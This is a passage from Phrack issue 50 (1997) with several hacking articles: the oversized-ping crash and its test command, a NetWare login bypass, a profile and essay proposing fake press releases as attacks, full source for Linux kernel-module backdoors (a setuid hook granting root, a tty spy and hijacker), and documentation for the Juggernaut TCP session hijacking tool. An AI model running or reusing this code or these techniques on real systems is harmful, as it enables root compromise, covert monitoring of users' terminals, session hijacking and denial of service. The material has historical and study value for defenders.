devastating. Some vulnerable machines will hang for a relatively short period
time then recover, some hang indefinitely, others dump core (writing a huge
file of current memory contents, often followed by a crash), some lose
all network connectivity, many rebooted or simply gave up the ghost.
[ Relevant IP Basics ]
Contrary to popular belief, the problem has nothing to do with the
`ping` program. The problem lies in the IP module. More specifically,
the problem lies the in the fragmentation/reassembly portion of the IP module.
This is portion of the IP protocol where the packets are broken into smaller
pieces for transit, and also where they are reassembled for processing. An IP
packet has a maximum size constrained by a 16-bit header field (a header is a
portion of a packet that contains information about the packet, including
where it came from and where it is going). The maximum size of an IP packet
is 65,535 (2^16-1) bytes. The IP header itself is usually 20 bytes so this
leaves us with 65,515 bytes to stuff our data into. The underlying link layer
(the link layer is the network logically under IP, often ethernet) can seldom
handle packets this large (ethernet for example, can only handle packets up to
1500 bytes in size). So, in order for the link layer to be able to digest a
large packet, the IP module must fragment (break down into smaller pieces)
each packet it sends to down to the link layer for transmission on the network.
Each individual fragment is a portion of the original packet, with its own
header containing information on exactly how the receiving end should put it
back together. This putting the individual packets back together is called
reassembly. When the receiving end has all of the fragments, it reassembles
them into the original IP packet, and then processes it.
[ The attack ]
The large packet attack is quite simple in concept. A malicious user
constructs a large packet and sends it off. If the destination host is
vulnerable, something bad happens (see above). The problem lies in the
reassembly of these large packets. Recall that we have 65,515 bytes of space
in which to stuff data into. As it happens, a few misbehaved applications
(and some specially crafted evil ones) will allow one to place slightly more
data into the payload (say 65,520 bytes). This, along with a 20 byte IP
header, violates the maximum packet size of 65,535 bytes. The IP module will
then simply break this oversized packet into fragments and eschew them to
their intended destination (target). The receiving host will queue all of the
fragments until the last one arrives, then begin the process of reassembly.
The problem will surface when the IP module finds that the packet is in
fact larger than the maximum allowable size as an internal buffer is
overflowed. This is where something bad happens (see above).
[ Vulnerability Testing and Patching ]
Testing to see if a network device is vulnerable is quite easy.
Windows NT and Windows 95 will allow construction of these oversized
packets without complaining. Simply type: `ping -l 65508 targethost`. In
this case, we are delivering an oversized IP packet inside of a ping packet,
which has a header size of 8 bytes. If you add up the totals, 20 bytes of IP
header + 8 bytes of ping header + 65,508 bytes of data, you get a 65,536 byte
IP packet. This is enough to cause affected systems to have problems.
Defense is preventative. The only way to really be safe from this
attack is to either ensure your system is patched, or unplug its network tap.
There are patches available for just about every vulnerable system. For
a copious list of vulnerable systems and patches, check out a 'Ping of Death'
webpage near you.
daemon9
Editor, Phrack Magazine
(daemon9@netcom.com)
---------------------------------------------------------------------------
To: route@onyx.infonexus.com
From: xxxx xxxxxxxxxxx
Subject: Re: ?
Status: RO
Actually, hang on. I've looked your story up and down looking for ways to
make it more interesting and I can't. I think it's actually just too
technical for us and lacks a newsworthiness that was evident in the SYN
article. I mean, you never tell us why we should care about this, and
frankly, I don't know why we should. So, you're welcome to take another
pass at it, otherwise, I'll give you the kill fee of $100.
xxxx
[ Too techinical? Any less techincal and I would have to make everything
rhyme so people wouldn't fall asleep. ]
---------------------------------------------------------------------------
----<>----
Netware Insecurities
Tonto
[the rant]
I realize that to most security professionals and
system administrators who will see this magazine,
the term "NetWare security" is a punchline. That
unfortunately does not change the fact that many
people in the field, myself included, must deal
with it daily. Really, honestly, I do agree with
you. Please don't write me to tell me about how
futile it is. I already know.
Since its release, not much security news has really
surfaced surrounding Novell NetWare 4. A lot of the
security flaws that were present in 3.1x were 'fixed'
in 4.x since Novell pretty much redesigned the way
the user/resource database worked, was referenced,
and stored. Some flaws remained, although fixes for
them are well-known, and easily applied. However,
NetWare 4 came with its own batch of new security
flaws, and Novell has done a poor job of addressing
them, hoping that consumer-end ignorance and the
client/server software's proprietary design will hide
these holes. You'd figure they would know better by
now.
The ability to use a packet sniffer to snag RCONSOLE
passwords still exists; NetWare 4 institutes client-end
authentication to implement its auto-reconnect feature;
the list goes on. Below are just a couple of examples
of such bugs and how to deal with them. As new Novell
products bring many existing LANs out onto the Internet,
I think you will see more of this sort of thing coming
to the surface. I hope that when it does, Novell decides
to take a more responsible role in security support for
its products. I'd hate for such a widely used product
to become the next HP/UX.
[the exploits]
[BUG #1]
This bug is known to affect NetWare 4.10. It's probably present in 4.01
and other versions that support Directory Services, but I haven't
verified this. I'm only a CNA, so I tried to verify this bug by talking
to a group of CNEs and nobody had heard of this, although there are
apparently other bugs in previous versions of LOGIN.EXE.
The bug is a combination of some weak code in LOGIN-4.12
(SYS:\LOGIN\LOGIN.EXE) and a default User object in NDS - the user template
USER_TEMPLATE. LOGIN allows input fields to be passed directly, instead
of filtered, if they are passed to LOGIN correctly -- by specifying an
object's context explicitly (as opposed to implicitly by using CX) and
putting the User object's name in quotes.
F:\PUBLIC>LOGIN SVR1/"USER_TEMPLATE"
For Server object SVR1 in an appropriate context, this would probably work
and give a generic level of user access, perhaps to other volumes,
programs, etc. That will vary depending on the setup of the server.
The fix is simple. Load SYS:\PUBLIC\NWADMIN.EXE and disable the user
template's login. But from now on, you will have to manually enable
login for any new User objects created in your tree.
[BUG #2]
This isn't a bug as much as a failed attempt to add security to a DOS file
system. But since Novell touts (and teaches) it as a file system security
tool, it is worth addressing.
NetWare comes with a tool called FLAG, which is supposed to be the NetWare
equivalent of UNIX's chmod(), in that it controls file attributes for files
on local and NetWare file systems. The problem lies in that Novell
thought it would be neat to incorporate its tool into the world of DOS file
attributes as well. So they made FLAG alter DOS file attributes
automatically to correspond with the new attributes installed by FLAG.
This would've been cool, except that DOS's ATTRIB.EXE can also be used to
change the DOS-supported file attributes set by FLAG. (Archive, Read-only,
Hidden, and System, respectively) And since ATTRIB doesn't reference NDS
in any way, the problem is obvious; A file that was marked Read-only by
its owner, using FLAG, could be compromised by a user other than its owner,
with ATTRIB, and then altered or deleted.
There isn't an easy fix for something that is this broken, so it is
simply recommended that you use IRFs (carefully) to designate file rights
on your server.
[ 01-07-97 - Tont0 ]
----<>----
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
4 of 16
-:[ Phrack Pro-Phile ]:-
Aleph One
~~~~~~~~~
Personal
~~~~~~~~
Handle: Aleph One
Call him: Aleph
Past handles: None
Handle origin: Transfinite Math
("Infinity and the Mind" by Rudy Rucker)
Date of Birth: 1974
Height: 6 feet
Weight: No idea.
Eye color: Olive
Hair Color: Dark Brown
Computers: Two
Admin of: Underground.Org, and BugTraq
Sites Frequented: None. I got better things to do with my time.
URLs: http://www.disinfo.com/
Favorite Things
~~~~~~~~~~~~~~~
Women: Intelligent, sexy with beautiful eyes and class.
Cars: None. They are a pain. Ride a motorcycle.
Foods: Exotic. Sushi (Anago), Arab, Chinese, Vietnamese,
Thai, Indian, Ethiopian. Seafood. Meat. Anything on
a grill. Anything flambé. Wine: Chianti.
Music: Techno: Leftfield, Orbital, Underworld, Electric
Skychurch, Prodigy, Juno Reacto,
Chemical Brothers, Ambient, GOA Trace.
Rock: Tool, Marylin Mason, Beck, Garbage, NIN.
Classical: Bach, Baroque
Soundtracks: Natural Born Killers, The Piano, Braveheart,
RobRoy.
Books: "Godel, Escher, Bach" by Douglas R. Hofstadter
"Infinity and the Mind" by Rudy Rucker
"100 Years of Solitude" (in Spanish)
by Gabriel Garcia Marques
"Metamorphosis" by Kafka
Turn Ons: Intelligence. Class. Pierced belly buttons.
Tasteful tattoos. Long hair.
Turn Offs: Ignorance. Attitude. Bad tattoos.
Other passions, interests, loves:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Painting - Went to a painting/drawing class for 3 years. Did
everything from pencil, pastels, up to watercolors. I stopped going
when I started working with oils. I haven't painted in almost 7 years.
Too bad, I enjoyed it.
Math - For some reason I always liked math. I hated doing exercises,
but always liked the theory. Guess that's why my grades were not
better. I was intending to do a minor in math but I quit school
before that ever happened...
Reading - One of the things I value the most are my books. I really enjoy
reading. Sadly, lately, all I read are technical books. I need to
start reading other stuff again.
AI - When I started fooling around with computers I wanted to go into AI,
but the lack of material at my disposition at the time kept me from
delving into it too much.
Most memorable experiences:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Death - It marks your life for ever.
Burning Man '95 - One of the most intense experiences of my life.
Nothing can compare to the creation and expression of this community
that grows and dies in one of the most inhospitable, yet more
beautiful, places on earth.
Some people to mention:
~~~~~~~~~~~~~~~~~~~~~~~
Annaliza (for all the rides from work, all the adventures, always being
there, and the hot cocoa)
Luis (for all the good times, the bad times, and begin one fucking
crazy Spanish cosaco)
Mr. Upsetter, Buckaroo Banzai, Dan, Rod & Rika, Sir Dystic, Freqout,
White Knight & Loren (for being good friends)
Intrepid Traveller (for giving me the number to Lunatic Labs)
Noid, Pappy, Phax, Elvis Smurf, Ming of Mongo, TRW, Clockwork, and the
rest of the old LA 2600 crew (for being themselves)
Veggie (for being larger than life)
Mycroft (who would have thought?)
r00t (for being elite)
A few things you would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Knowledge come from within.
The New Security Threat: Disinformation
Statistics show that network break-ins are on the rise. Entities
connecting to the Net expect to be broken into. They know it's only
a matter of time before some random hacker targets their machines using
the latest warez to bypass their firewall and break into their machine.
They have seen it happen over and over. The CIA, DOJ, NASA, MGM/UA, etc.
The modus operandi is always the same: Deface the web page, or trash the
machines. For this occurrence they have prepared. Backups are in place, and
ready to be used. Hacked web pages hardly stay up more than half and hour
before they are taken down. What ever message the hackers wanted to deliver
was probably only seen by a handful of people. There no longer is any
incentive to hack a web site that no one will see.
So what is next? Disinformation.
The Internet as a medium facilitates the free flow of information. Single
individuals can reach large, as yet before unreachable audiences. Information
that before would have been relegated to some obscure corner, now travels at
the speed of light and is disseminated all over the world. Everyday the Net
is becoming a more important source of leads and information for the standard
news media. It usually only takes a few hours before some information such
as a new product, or some new bug, published on the Net appears on TV or
some newspaper's web site. And as more companies publish information online
our dependence on the Net as a source of information will only increase.
But the medium does not attempt to validate or even authenticate this
information in most cases. A anonymous tip on some newsgroup or web site
can cause a company a lot of headaches. Even the worst are half-truths.
Just look at the damage control that corporations such as Microsoft and Intel
had to do in the past. But this is only the beginning.
What if that motivated hacker decides that instead of replacing the
company's web site with some obscene language and graphics that will be
taken down almost immediately we will add a small officially worded press
release to the web site. How long until someone notices? How long until
they realize it's a fake. Maybe we should also email the press release to
some media contacts. What are the chances that it will be catch before it
makes it into the news? Or that it will catch before it's discussed on some
newsgroup with a large audience?
The amount of damage control a well placed piece of information coming
from a seemingly reputable source is incredible. This, I believe, is where
future attacks lay.
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
5 of 16
============================================
Abuse of the Linux Kernel for Fun and Profit
halflife@infonexus.com
[guild corporation]
============================================
Introduction
------------
Loadable modules are a very useful feature in linux, as they let
you load device drivers on a as-needed basis. However, there is
a bad side: they make kernel hacking almost TOO easy. What happens
when you can no longer trust your own kernel...? This article describes
a simple way kernel modules can be easily abused.
System calls
------------
System calls. These are the lowest level of functions available, and
are implemented within the kernel. In this article, we will discuss how
they can be abused to let us write a very simplistic tty hijacker/monitor.
All code was written and designed for linux machines, and will not compile
on anything else, since we are mucking with the kernel.
TTY Hijackers, such as tap and ttywatcher are common on Solaris,
SunOS, and other systems with STREAMS, but Linux thus far has not had
a useful tty hijacker (note: I don't consider pty based code such as
telnetsnoop to be a hijacker, nor very useful since you must make
preparations ahead of time to monitor users).
Since linux currently lacks STREAMS (LinSTREAMS appears to be dead),
we must come up with a alternative way to monitor the stream. Stuffing
keystrokes is not a problem, since we can use the TIOCSTI ioctl to stuff
keystrokes into the input stream. The solution, of course, is to redirect
the write(2) system call to our own code which logs the contents of the
write if it is directed at our tty; we can then call the real write(2)
system call.
Clearly, a device driver is going to be the best way to do things. We
can read from the device to get the data that has been logged, and add
a ioctl or two in order to tell our code exactly what tty we want to log.
Redirection of system calls
---------------------------
System calls are pretty easy to redirect to our own code. It works in
principle like DOS terminate and stay resident code. We save the old
address in a variable, then set a new one pointing to our code. In our
code, we do our thing, and then call the original code when finished.
A very simple example of this is contained in hacked_setuid.c, which
is a simple loadable module that you can insmod, and once it is inserted
into the kernel, a setuid(4755) will set your uid/euid/gid/egid to 0.
(See the appended file for all the code.) The addresses for the
syscalls are contained in the sys_call_table array. It is relatively easy
to redirect syscalls to point to our code. Once we have done this, many
things are possible...
Linspy notes
------------
This module is VERY easy to spot, all you have to do is cat /proc/modules
and it shows up as plain as day. Things can be done to fix this, but I
have no intention on doing them.
To use linspy, you need to create an ltap device, the major should
be 40 and the minor should be 0. After you do that, run make and then
insmod the linspy device. Once it is inserted, you can run ltread [tty]
and if all goes well, you should see stuff that is output to the user's
screen. If all does not go well ... well, I shall leave that to your
nightmares.
The Code [use the included extract.c utility to unarchive the code]
---------------------------------------------------------------------
<++> linspy/Makefile
CONFIG_KERNELD=-DCONFIG_KERNELD
CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD)
CC=gcc
# this is the name of the device you have (or will) made with mknod
DN = '-DDEVICE_NAME="/dev/ltap"'
# 1.2.x need this to compile, comment out on 1.3+ kernels
V = #-DNEED_VERSION
MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX
all: linspy ltread setuid
linspy: linspy.c /usr/include/linux/version.h
$(CC) $(MODCFLAGS) -c linspy.c
ltread:
$(CC) $(DN) -o ltread ltread.c
clean:
rm *.o ltread
setuid: hacked_setuid.c /usr/include/linux/version.h
$(CC) $(MODCFLAGS) -c hacked_setuid.c
<--> end Makefile
<++> linspy/hacked_setuid.c
int errno;
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
static inline _syscall1(int, setuid, uid_t, uid);
extern void *sys_call_table[];
void *original_setuid;
extern int hacked_setuid(uid_t uid)
{
int i;
if(uid == 4755)
{
current->uid = current->euid = current->gid = current->egid = 0;
return 0;
}
sys_call_table[SYS_setuid] = original_setuid;
i = setuid(uid);
sys_call_table[SYS_setuid] = hacked_setuid;
if(i == -1) return -errno;
else return i;
}
int init_module(void)
{
original_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = hacked_setuid;
return 0;
}
void cleanup_module(void)
{
sys_call_table[SYS_setuid] = original_setuid;
}
<++> linspy/linspy.c
int errno;
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef MODULE
#include
#include
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* set the version information, if needed */
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
#ifndef MIN
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#endif
/* ring buffer info */
#define BUFFERSZ 2048
char buffer[BUFFERSZ];
int queue_head = 0;
int queue_tail = 0;
/* taken_over indicates if the victim can see any output */
int taken_over = 0;
static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
extern void *sys_call_table[];
/* device info for the linspy device, and the device we are watching */
static int linspy_major = 40;
int tty_minor = -1;
int tty_major = 4;
/* address of original write(2) syscall */
void *original_write;
void save_write(char *, size_t);
int out_queue(void)
{
int c;
if(queue_head == queue_tail) return -1;
c = buffer[queue_head];
queue_head++;
if(queue_head == BUFFERSZ) queue_head=0;
return c;
}
int in_queue(int ch)
{
if((queue_tail + 1) == queue_head) return 0;
buffer[queue_tail] = ch;
queue_tail++;
if(queue_tail == BUFFERSZ) queue_tail=0;
return 1;
}
/* check if it is the tty we are looking for */
int is_fd_tty(int fd)
{
struct file *f=NULL;
struct inode *inode=NULL;
int mymajor=0;
int myminor=0;
if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
return 0;
mymajor = major(inode->i_rdev);
myminor = minor(inode->i_rdev);
if(mymajor != tty_major) return 0;
if(myminor != tty_minor) return 0;
return 1;
}
/* this is the new write(2) replacement call */
extern int new_write(int fd, char *buf, size_t count)
{
int r;
if(is_fd_tty(fd))
{
if(count > 0)
save_write(buf, count);
if(taken_over) return count;
}
sys_call_table[SYS_write] = original_write;
r = write(fd, buf, count);
sys_call_table[SYS_write] = new_write;
if(r == -1) return -errno;
else return r;
}
/* save data from the write(2) call into the buffer */
void save_write(char *buf, size_t count)
{
int i;
for(i=0;i < count;i++)
in_queue(get_fs_byte(buf+i));
}
/* read from the ltap device - return data from queue */
static int linspy_read(struct inode *in, struct file *fi, char *buf, int count)
{
int i;
int c;
int cnt=0;
if(current->euid != 0) return 0;
for(i=0;i < count;i++)
{
c = out_queue();
if(c < 0) break;
cnt++;
put_fs_byte(c, buf+i);
}
return cnt;
}
/* open the ltap device */
static int linspy_open(struct inode *in, struct file *fi)
{
if(current->euid != 0) return -EIO;
MOD_INC_USE_COUNT;
return 0;
}
/* close the ltap device */
static void linspy_close(struct inode *in, struct file *fi)
{
taken_over=0;
tty_minor = -1;
MOD_DEC_USE_COUNT;
}
/* some ioctl operations */
static int
linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args)
{
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
if(current->euid != 0) return -EIO;
switch(cmd)
{
case LS_SETMAJOR:
tty_major = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_SETMINOR:
tty_minor = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_FLUSHBUF:
queue_head=0;
queue_tail=0;
break;
case LS_TOGGLE:
if(taken_over) taken_over=0;
else taken_over=1;
break;
default:
return 1;
}
return 0;
}
static struct file_operations linspy = {
NULL,
linspy_read,
NULL,
NULL,
NULL,
linspy_ioctl,
NULL,
linspy_open,
linspy_close,
NULL
};
/* init the loadable module */
int init_module(void)
{
original_write = sys_call_table[SYS_write];
sys_call_table[SYS_write] = new_write;
if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO;
return 0;
}
/* cleanup module before being removed */
void cleanup_module(void)
{
sys_call_table[SYS_write] = original_write;
unregister_chrdev(linspy_major, "linspy");
}
<--> end linspy.c
<++> linspy/ltread.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct termios save_termios;
int ttysavefd = -1;
int fd;
#ifndef DEVICE_NAME
#define DEVICE_NAME "/dev/ltap"
#endif
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
void stuff_keystroke(int fd, char key)
{
ioctl(fd, TIOCSTI, &key);
}
int tty_cbreak(int fd)
{
struct termios buff;
if(tcgetattr(fd, &save_termios) < 0)
return -1;
buff = save_termios;
buff.c_lflag &= ~(ECHO | ICANON);
buff.c_cc[VMIN] = 0;
buff.c_cc[VTIME] = 0;
if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
return -1;
ttysavefd = fd;
return 0;
}
char *get_device(char *basedevice)
{
static char devname[1024];
int fd;
if(strlen(basedevice) > 128) return NULL;
if(basedevice[0] == '/')
strcpy(devname, basedevice);
else
sprintf(devname, "/dev/%s", basedevice);
fd = open(devname, O_RDONLY);
if(fd < 0) return NULL;
if(!isatty(fd)) return NULL;
close(fd);
return devname;
}
int do_ioctl(char *device)
{
struct stat mystat;
if(stat(device, &mystat) < 0) return -1;
fd = open(DEVICE_NAME, O_RDONLY);
if(fd < 0) return -1;
if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
}
void sigint_handler(int s)
{
exit(s);
}
void cleanup_atexit(void)
{
puts(" ");
if(ttysavefd >= 0)
tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
}
main(int argc, char **argv)
{
int my_tty;
char *devname;
unsigned char ch;
int i;
if(argc != 2)
{
fprintf(stderr, "%s ttyname\n", argv[0]);
fprintf(stderr, "ttyname should NOT be your current tty!\n");
exit(0);
}
devname = get_device(argv[1]);
if(devname == NULL)
{
perror("get_device");
exit(0);
}
if(tty_cbreak(0) < 0)
{
perror("tty_cbreak");
exit(0);
}
atexit(cleanup_atexit);
signal(SIGINT, sigint_handler);
if(do_ioctl(devname) < 0)
{
perror("do_ioctl");
exit(0);
}
my_tty = open(devname, O_RDWR);
if(my_tty == -1) exit(0);
setvbuf(stdout, NULL, _IONBF, 0);
printf("[now monitoring session]\n");
while(1)
{
i = read(0, &ch, 1);
if(i > 0)
{
if(ch == 24)
{
ioctl(fd, LS_TOGGLE, 0);
printf("[Takeover mode toggled]\n");
}
else stuff_keystroke(my_tty, ch);
}
i = read(fd, &ch, 1);
if(i > 0)
putchar(ch);
}
}
<--> end ltread.c
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
6 of 16
J U G G E R N A U T
route|daemon9
a guild corporation production 1996/7
Please use the included extract.c utility to extract the files and then
read the Install file. Any problems/comments mail me route@infonexus.com.
A boot image is forthcoming that will allow a user to simply pop a disk
into most any networked PC and turn it into a Juggernaut workstation.
<++> Juggernaut/ClothLikeGauze/.help
Juggernaut 1.0 Help File
|--------
|Overview
|--------
Juggernaut is a robust network tool for the Linux OS. It contains several
modules offering a wide degree of functionality. Juggernaut has been tested
successfully on several different Linux machines on several different networks.
However, your mileage may vary depending on the network topologies of the
environment (ie: Smart hubbing will kill much of the packet sniffing
functionality...) and, to a lesser extent, the machine running Juggernaut.
If something doesn't work, use a network debugger and figure out why...
Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on
April 9, 1997.
Any serious problems/bugs or comments, please mail me:
route@infonexus.com
|---------------------
|Command Line Options
|---------------------
juggernaut -h
Quick help.
juggernaut -H
Dumps this help file.
juggernaut -v
By default, Juggernaut conveys error messages and other
diagnostic information to the user. Specifying this
option will cause Juggernaut to shut the hell up.
Not recommended unless you know what you are doing.
juggernaut -t xx [ juggernaut -t 5 ]
This option specifies the network read timeout (which
defaults to 10 seconds). This value reflects how long
Juggernaut will wait for network traffic before giving
up. In this case, it will wait 5 seconds.
juggernaut -s TOKEN [ juggernaut -s login ]
Dedicated sniffing mode. Juggernaut will drop to the
background and examine all TCP packets looking for
TOKEN. When TOKEN is located, it then isolates that
TCP circuit and captures the next 16 (the default
enticement factor) packets and logs them to a file. It
then resets and continues sifting through TCP traffic
looking for TOKEN.
juggernaut -s TOKEN -e xx [ juggernaut -s daemon9 -e 1000 ]
By specifying a larger enticement factor, you can
capture more packets from a session. This time, after
locating TOKEN, Juggernaut will capture 1000 packets
before reseting.
juggernaut
This starts the program in standard mode.
|-------------
|Menu Options
|-------------
This is normal mode of operation for Juggernaut. This is where the magic
happens, this is where the fun is. The program will examine all network
traffic and add suitable TCP connections to the connection database (which
is viewed with option 1). After at least one connection is in the database,
you can start mucking around with it (connection construction and destruction
are indicated by the appearance of the "+" or the "-" at the console). Note
that connections involving a local interface may not show up (unless the
localhost is dual-homed).
One possible shortcoming of the program is the fact that it stores very
little state information about connections in the database. Juggernaut
collects whatever information it needs (and doesn't have) on the fly. As
such, a quiet connection (no traffic) will elude hijacking and reseting. The
benefit of this is the fact that the program does not have to tie itself up
updating the shared memory segment with state every time a packet flies by.
?) Help
This file.
0) Program information
Dumps some stuff...
1) Connection database
Dumps the current connection list and percent to
capacity. Gives the option to wipe the database.
2) Spy on a connection
Allows a user to spy on any connection in the database,
with the option of logging the entire session to a
file.
3) Reset a connection
Allows the user to destroy any existing connection in
the database.
4) Automated connection reset daemon
Allows the user to setup an automated TCP RST daemon
that will listen for connection request attempts
from a specified source host (and optionally a
destination host) and then reset them before they
have a chance to complete. Requires a source IP
address and optionally a destination address.
This module prints a "*" to the console when a
connection request attempt is attempted and denied...
5) Simplex connection hijack
Allows the user to insert a command into a telnet
based TCP stream. A short ACK storm ensues until the
connection is subsequently reset.
6) Interactive connection hijack
Allows the user to take over a session from a
legitimate client. This desynchs the client from the
server as the user takes over. The resulting ACK
storm can be catastrophic and makes this interactive
session prone to failure. If both of the target hosts
are on an ethernet, expect a momunmental ACK storm.
7) Packet assembly module
The Prometheus module. Construction of TCP, UDP, ICMP,
and IP packets. The user has complete control over
most of the header fields and can opt for generating a
pseudo-random value. This module is far from done and
needs some serious work.
8) Souper sekret option number eight
Sshh.
9) Step down
Quitter.
|-------------
|Suggested Use
|-------------
scenario 1: The passive observer
menu options 1,2
The user is curious. She simply waits for
connections to arrive and then passively observes
them. Several invocations of Juggernaut may be
started, each spying on a different connection.
The user does not modify the flow of data or control.
scenario 2: The malicious observer
menu options 1,2,3
Same scenario as above, except the user alters the
flow of control and opts to destroy connections
at some point.
scenario 3: The active observer
menu options 1,2,3,5,(6)
Same as the previous situations, however the user
inserts data into the stream before destroying it.
scenario 4: The imp
menu options 1,2,3,4
The user is an impish devil and simply wants to
cause trouble by setting up multiple ACRST daemons.
scenario 5: The active observer with poisonous reverse
menu options 1,2,4,5
The user waits until a client establishes a connection
with a targeted server and then sets up the ACRST
daemon to destroy all further connection-request
attempts from the client. The user then spys on the
connection, waiting for an opportune time to inject
a hijack packet into the stream containing a
backdooring command/pipeline. The client will then
have her connection RST (after a brief ACK storm).
If the client attempts to re-establish the connection
with the server, she will be denied and likely think
it is a transient network error. The user can then
login into the server using the backdoor without fear
of the client logging back in.
Juggernaut is a Guild Corporation production, (c) 1996/7.
[corporate persuasion through Internet terrorism]
EOF
<-->
<++> Juggernaut/ClothLikeGauze/MANIFEST
File Manifest for Juggernaut 1.0
----------------------------
1996/7 daemon9[guild|phrack|r00t]
----------------------------
ClothLikeGauze/ Docs
.help Helpfile
copyright The legal tie that binds.
Install Installation instructions
MANIFEST This file
Makefile makefile
NumberOneCrush/ Sources
main.c main logic
mem.c shared memory/semaphore functions
menu.c menu functions
prometheus.c packet assembly workshop module
net.c socket/network functions
surplus.c dumping ground
Version history
---------------
version a1:
-----------
11.30.96: Decided to start. Juggernaut framework and queue stuff. Used
linked list queue originally to store connections.
12.01.96: Sniffing/spying/logging/RST stuff.
12.02-04: Not sure what I did here. I think I had a large turkey samich.
12.05.96: Redid memory abstract data type. Multithreaded. Implemented
shared memory segment and semaphore for access control.
Dumped ALL the dynamic memory allocation code.
12.06.96: Added packet assembly workshop hooks. Added curses. Removed
curses.
12.07.96: No coding today.
12.08.96: Non-interactive hijacking completed. I think we're ready for
beta now.
version b1:
-----------
12.09.96: IP_HDRINCL crap added.
12.15-18: I was in NYC for the r00tparty. No coding then.
12.19.96: Added automated RST stuff.
12.20-27: No coding.
12.28.96: Started work on interactive hijacking. Damned ACK storms.
12.30.96: Started packet assembly module for reals.
version b2:
-----------
01.25.97: Added network timeout logic.
01.26.97-
04.01.97: How can you possibly expect me to account for all that time?
I went to Germany with alhambra for a networking summit and
all over the US for other work, I was even in a Discovery
special on IW...
version 1.0:
------------
04.02.97: Here it is.
<-->
<++> Juggernaut/ClothLikeGauze/ToDo
Juggernaut ToDo list
--------------------
+ re-structure multitasking model to give the option of
using multi-processing OR multi-threading
+ Create boot image
+ Support for ongoing connections
+ Support for healthy choice hotdog sequencer
+ Add arp cache seeding routine; as connections are added, MAC
addresses will be added to the arp cache
+ Add support for different verbosity levels
+ Add support for IP and TCP options in packet assembly module
+ Better packet assembly support as a whole
+ Better code module plug-in support
+ much more robust packet sniffing module with support for
multiple protocols
+ um, interactive hijacking that doesn't kill the client
<-->
<++> Juggernaut/ClothLikeGauze/copyright
Juggernaut
Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com)
Juggernaut source code, documentation, auxilliary programs, and
executables are Copyright 1996/7 daemon9[guild]. All rights reserved.
----------------------------------------------------------------------
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
675 Mass Ave, Cambridge, MA 02139, USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
�
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or wor